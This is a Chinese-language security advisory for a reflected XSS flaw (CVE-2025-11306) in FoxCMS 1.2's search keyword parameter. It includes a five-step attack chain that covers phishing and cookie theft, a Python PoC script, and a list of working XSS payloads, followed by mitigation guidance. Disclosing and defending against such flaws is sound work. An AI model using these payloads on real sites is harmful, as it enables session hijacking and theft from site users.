CVE-2025-11306：FoxCMS 1.2搜索页面跨站脚本漏洞

漏洞信息

漏洞编号

CVE-2025-11306

漏洞类型

跨站脚本攻击（XSS）

CVSS评分

4.3 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

需要交互 (UI:R)

影响产品

qianfox FoxCMS

漏洞概述

CVE-2025-11306是qianfox公司开发的FoxCMS内容管理系统中存在的一个跨站脚本（XSS）漏洞。该漏洞影响FoxCMS 1.2及以下版本，位于系统的搜索功能组件中，具体存在于/index.php/Search文件的搜索页面。攻击者可以通过操纵搜索功能中的keyword参数注入恶意脚本代码，从而实现跨站脚本攻击。

该漏洞的CVSS 3.1评分为4.3分，属于中危级别。漏洞的攻击向量为网络（AV:N），攻击复杂度低（AC:L），无需任何权限认证（PR:N），但需要用户交互（UI:R）才能触发攻击。从影响范围来看，该漏洞对机密性影响较低（C:L），对完整性影响较低（I:L），对可用性无影响（A:N）。

值得注意的是，该漏洞的利用代码已经被公开披露，供应商在漏洞披露前已被通知但未做出任何响应，这意味着所有使用受影响版本的用户都面临潜在的安全风险。FoxCMS作为一款内容管理系统，通常被用于构建网站和管理内容，一旦遭受XSS攻击，可能导致用户会话被劫持、敏感信息泄露、网站内容被篡改等安全问题。

技术细节

该XSS漏洞位于FoxCMS的搜索功能组件中，具体出现在/index.php/Search端点的搜索页面。当用户执行搜索操作时，系统会将用户输入的keyword参数直接输出到搜索结果页面，而没有进行充分的输入过滤和输出编码处理。

漏洞利用原理：
1. 攻击者构造包含恶意JavaScript代码的搜索关键词，例如使用<script>alert('XSS')</script>或其他HTML/JS注入语句；
2. 通过访问类似/index.php/Search?keyword=<恶意代码>的URL，将恶意代码注入到搜索请求中；
3. 由于服务器端未对keyword参数进行适当的HTML实体编码或过滤，恶意脚本被直接嵌入到返回的HTML页面中；
4. 当受害者（已登录用户）点击或访问该恶意构造的URL时，嵌入的脚本将在受害者的浏览器上下文中执行；

漏洞利用方式：
- 反射型XSS：恶意脚本通过URL参数传递，仅在用户点击特制链接时执行；
- 攻击者可窃取用户的Cookie、会话令牌等敏感信息；
- 可用于钓鱼攻击，在受信任域名上显示伪造内容；
- 可用于劫持用户会话，执行未授权操作；
- 可结合其他漏洞进行进一步攻击，如CSRF等。

由于该漏洞无需认证即可远程利用，且PoC已公开，攻击门槛较低，对使用FoxCMS构建的网站构成实际威胁。

攻击链分析

STEP 1

步骤1：信息收集

攻击者通过搜索引擎或扫描工具识别目标网站是否使用FoxCMS 1.2及以下版本，并定位搜索功能页面/index.php/Search。

STEP 2

步骤2：构造恶意URL

攻击者构造包含恶意JavaScript代码的搜索请求URL，将恶意脚本作为keyword参数的值，例如/index.php/Search?keyword=<script>恶意代码</script>。

STEP 3

步骤3：诱导用户点击

攻击者通过钓鱼邮件、社交工程或其他方式诱导已登录的目标用户点击恶意URL。由于漏洞需要用户交互，攻击者需要欺骗受害者主动访问。

STEP 4

步骤4：恶意脚本执行

用户的浏览器加载搜索结果页面时，由于服务器未对keyword参数进行过滤，恶意JavaScript代码在用户浏览器上下文中执行。

STEP 5

步骤5：信息窃取或进一步攻击

恶意脚本可窃取用户的Cookie、会话令牌等敏感信息，或执行其他恶意操作如伪造表单、劫持会话等，从而危害用户和网站安全。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# CVE-2025-11306 - FoxCMS 1.2 XSS PoC
# Vulnerability: Reflected XSS in /index.php/Search via keyword parameter

import requests

# Target URL
target_url = "http://target-site.com/index.php/Search"

# Malicious payload to inject JavaScript
payload = '<script>alert("XSS-CVE-2025-11306")</script>'

# Construct the exploit URL
params = {
    "keyword": payload
}

# Send the malicious request
response = requests.get(target_url, params=params)

# Check if the payload is reflected without sanitization
if payload in response.text:
    print("[+] XSS vulnerability confirmed!")
    print(f"[+] Exploit URL: {response.url}")
else:
    print("[-] Payload not reflected, target may be patched")

# Alternative payloads for different scenarios
payloads = [
    '<img src=x onerror=alert(1)>',
    '<svg/onload=alert(1)>',
    '";alert(String.fromCharCode(88,83,83))//',
    '<body onload=alert(1)>',
    '<iframe src="javascript:alert(1)">'
]

for p in payloads:
    r = requests.get(target_url, params={"keyword": p})
    if p in r.text:
        print(f"[+] Reflected payload found: {p}")

影响范围

qianfox FoxCMS <= 1.2

防御指南

临时缓解措施

在等待官方修复期间，建议采取以下临时缓解措施：1）对搜索功能的keyword参数进行服务端过滤，移除或转义HTML特殊字符（如<、>、"、'等）；2）在前端使用成熟的XSS防护库（如DOMPurify）对输出内容进行净化；3）部署WAF规则拦截常见的XSS攻击载荷；4）为网站启用严格的内容安全策略（CSP），限制内联脚本执行；5）将搜索功能暂时禁用或限制访问权限；6）密切监控网站日志，及时发现可疑的搜索请求。